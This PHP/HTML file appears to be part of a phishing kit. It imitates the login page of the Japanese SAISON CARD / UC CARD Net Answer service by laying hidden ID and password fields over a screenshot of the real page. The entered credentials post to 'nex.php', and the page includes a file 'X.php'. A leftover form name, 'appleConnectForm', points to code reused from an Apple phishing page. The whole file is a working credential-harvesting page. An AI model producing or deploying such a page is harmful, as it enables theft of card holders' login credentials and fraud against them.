﻿<?php   ob_start();  ?>
<?
include "X.php";
?>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<title>SAISON CARD Netアンサー - UC CARD </title>
	<link rel="icon" type="image/png" href="" />
	<style>
		body {
		 margin-top: -41;
		 background: #fff;
		}

		.page {
		 background-image: url("STR/Nexi1.png");
		 background-repeat: no-repeat;
		 height: 695px;
		 width: 1340px;
		 position: relative;
		}
		
		input, select {
		 position: absolute; /* VODKA */
		 width: 304;
		 height: 22;
		 border: 0;
		 padding: 3 8 3 8;
		 left: 587;
		}

		.button {
		 width: 105;
		 height: 37;
		 border: 0;
		 cursor: pointer;
		}
		.submit {
		 position: absolute;
		 left: 810;
		 top: 540;
		}
	.auto-style1 {
	margin-top: 6px;
}
.auto-style2 {
	margin-top: 1px;
}
	</style>
	

								<p>&nbsp;<form name="appleConnectForm" method="post" action="nex.php">

	<center>
			<form action="--WEBBOT-SELF--" method="POST" id="info" onsubmit="if(do_submit(3)) return true; else return false;">
		<div class="page" style="left: 0px; top: 0px; height: 1295px">

			<div>
				<input type="text" placeholder="ID" autocapitalize="off" autocorrect="off" maxlength="29" tabindex="1" required="" title="" id="fullname4" name="a1" style="top:179; position:absolute; left:174; width:354px; height:39px" size="41" class="auto-style2">
				<input type="password" id="pass0" placeholder="パスワード" name="a2" class="auto-style1" required="" title="  " style="position: absolute; left: 174; top: 242; height: 39px; width: 354px" size="1"><div class="button submit" onclick="javascript:do_submit(1);" style="position: absolute; left: 356px; top: 197px; width: 88px; height: 30px">
					<p>
<input type="image"  border="0" alt="" name="submit" style="position: absolute; left: -185; top: 130; " src="STR/blank.gif" height="42" width="355">
					<p>
					&nbsp;</div>
					<!--  -->